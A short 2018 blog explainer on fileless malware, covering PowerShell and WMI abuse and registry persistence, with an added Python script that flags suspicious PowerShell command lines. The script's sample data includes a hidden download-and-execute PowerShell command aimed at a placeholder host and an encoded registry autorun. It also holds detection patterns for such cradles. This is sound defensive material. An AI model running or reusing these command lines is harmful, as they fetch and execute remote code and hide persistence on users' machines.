What is Fileless Malware

Tech-Simplified
2 min read · May 5, 2018

Fileless malware goes by many names, including ‘non-malware’, ‘memory-based malware’ and ‘living off the land attacks’.

Fileless malware is not like traditional malware, which installs files on a computer to perform its task. Instead it is command-based malware that hijacks built-in Windows tools such as PowerShell and WMI (Windows Management Instrumentation).

This makes it difficult for traditional antivirus programs to detect the malware: since PowerShell and WMI are legitimate programs, any command they execute is assumed to be legitimate as well.

How does it work: example

Where does it reside

  1. RAM ~ some fileless malware resides here without ever being written to the hard drive. This type is uncommon, because RAM is cleared as soon as the system is restarted.
  2. Registry ~ the registry is a database of low-level settings that Windows and installed software use. Some fileless malware stores itself here in a way that goes undetected.

What makes it so powerful and dangerous

  1. Fileless malware is not detectable by traditional antivirus.
  2. Fileless malware uses PowerShell, a powerful scripting language with access to the machine's inner workings and the Windows API; it can also be used to execute commands remotely with high privileges.
  3. Fileless malware uses WMI, which allows administrators to install software, change user privileges and allocate resources. It is mostly used by IT administrators, so it is a very powerful tool when misused by malware.

How to protect yourself from Fileless Malware

  1. Keep your operating system and software up to date ~ fileless malware finds vulnerabilities in old software and exploits them.
  2. Disable PowerShell if it is not required.
  3. Use an antivirus with behavioral detection ~ an antivirus may not detect fileless malware from file properties, so it should be able to detect unusual or suspicious activity instead.
  4. Follow the principle of least privilege ~ do not give excess privileges to users who do not require them; the more privileges a user has, the more chances malware has to run with elevated authority. This is why IT firms don't hand out admin privileges to employees easily.
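The two points above that matter most to a defender are that fileless malware can hide in the registry (the "Where does it reside" list) and that it has to be caught by behaviour rather than by file properties (point 3 here). The following Python script is an added example, not code from the original post; it shows what "behavioral detection" of PowerShell and WMI misuse looks like in practice. It audits a registry export for autorun entries that launch PowerShell, and triages process-creation log lines, scoring each command line on indicators such as a hidden window, a skipped profile, an execution-policy bypass, an encoded command (which it decodes), registry reads and download cradles. The registry export, the log lines and every indicator name are constructed for this example; the `-EncodedCommand` value is built inline, since PowerShell expects UTF-16LE text encoded as base64.

```python
import base64
import re

# Built-in Windows tools the post names (PowerShell, WMI). Only command lines
# that invoke one of these are scored; everything else is ignored.
HOST_TOOLS = re.compile(r"\b(powershell(?:\.exe)?|pwsh|wmic(?:\.exe)?)\b", re.I)

# Behavioural indicators (names chosen for this example). Each one is weak on
# its own, which is why they are counted rather than treated as verdicts.
INDICATORS = {
    "hidden_window":     re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile":        re.compile(r"-nop(?:rofile)?\b", re.I),
    "policy_bypass":     re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "encoded_command":   re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I),
    "reads_registry":    re.compile(r"Get-ItemProperty|\bgp\b|HKCU:|HKLM:", re.I),
    "download_cradle":   re.compile(r"DownloadString|Invoke-WebRequest|\biwr\b", re.I),
    "invoke_expression": re.compile(r"Invoke-Expression|\biex\b", re.I),
}


def decode_encoded_command(cmd):
    """Return the plain text of a -EncodedCommand argument, or None."""
    m = INDICATORS["encoded_command"].search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess_command(cmd):
    """Score one command line: (score, indicator names hit, decoded payload)."""
    if not HOST_TOOLS.search(cmd):
        return 0, [], None
    decoded = decode_encoded_command(cmd)
    # Indicators are matched against the decoded text too, so encoding a
    # script does not hide what it does.
    text = cmd + ("\n" + decoded if decoded else "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    return len(hits), hits, decoded


# --- Registry: autorun entries that launch a host tool ---------------------

REG_VALUE = re.compile(r'^"([^"]+)"="((?:[^"\\]|\\.)*)"$')


def parse_reg_export(text):
    """Yield (key, name, value) for string values in a .reg export."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = REG_VALUE.match(line)
        if m and key:
            # .reg files escape backslashes and quotes with a backslash.
            yield key, m.group(1), re.sub(r"\\(.)", r"\1", m.group(2))


def audit_registry_export(text, threshold=3):
    findings = []
    for key, name, value in parse_reg_export(text):
        score, hits, decoded = assess_command(value)
        if score >= threshold:
            findings.append({"key": key, "name": name, "score": score,
                             "hits": hits, "decoded": decoded})
    return findings


# --- Process-creation log: behaviour of each PowerShell/WMI launch ---------

def triage_process_log(lines, threshold=3):
    """Lines are 'time|user|image|commandline' (constructed format)."""
    findings = []
    for line in lines:
        ts, user, _image, cmd = line.split("|", 3)
        score, hits, decoded = assess_command(cmd)
        if score >= threshold:
            findings.append({"time": ts, "user": user, "score": score,
                             "hits": hits, "decoded": decoded})
    return findings


# --- Constructed sample data -------------------------------------------------

def _encode(ps):
    """Build a -EncodedCommand value the way PowerShell expects it (UTF-16LE base64)."""
    return base64.b64encode(ps.encode("utf-16le")).decode()


SAMPLE_REG_EXPORT = (
    "Windows Registry Editor Version 5.00\n\n"
    "[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]\n"
    '"OneDrive"="\\"C:\\\\Users\\\\alice\\\\AppData\\\\Local\\\\OneDrive.exe\\" /background"\n'
    '"Updater"="powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand '
    + _encode("iex (Get-ItemProperty HKCU:\\Software\\Demo).Payload") + '"\n'
)

SAMPLE_PROCESS_LOG = [
    "2018-05-05T10:01:02Z|alice|C:\\Windows\\explorer.exe|explorer.exe",
    "2018-05-05T10:01:09Z|alice|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    'powershell.exe -ExecutionPolicy Bypass -NoProfile -c "Get-ChildItem C:\\Reports"',
    "2018-05-05T10:02:15Z|bob|C:\\Windows\\System32\\wbem\\wmic.exe|wmic.exe process list brief",
    "2018-05-05T10:03:40Z|alice|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    'powershell.exe -w hidden -nop -ep bypass -c "iex (New-Object Net.WebClient).DownloadString(\'http://example.invalid/x\')"',
]

if __name__ == "__main__":
    for f in audit_registry_export(SAMPLE_REG_EXPORT):
        print("registry:", f)
    for f in triage_process_log(SAMPLE_PROCESS_LOG):
        print("process:", f)
```

With the default threshold of 3, the OneDrive autorun and the plain `wmic` query score 0, the administrator's `-ExecutionPolicy Bypass -NoProfile` directory listing scores 2 and is left alone, while the hidden encoded autorun entry and the hidden download-and-execute launch each score 5 and are reported, together with the decoded script for the encoded one. Lowering the threshold trades false positives for coverage; on a real estate you would feed this from PowerShell script block logging and process-creation auditing rather than a constructed list.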

Sources & Artwork

www.bleepingcomputer.com

www.eset.com

www.cybereason.com

blog.emsisoft.com


Written by Tech-Simplified

Saket Sharma | Tech | Games | Photography | Cybersecurity | Hacking | & Stuff 😉
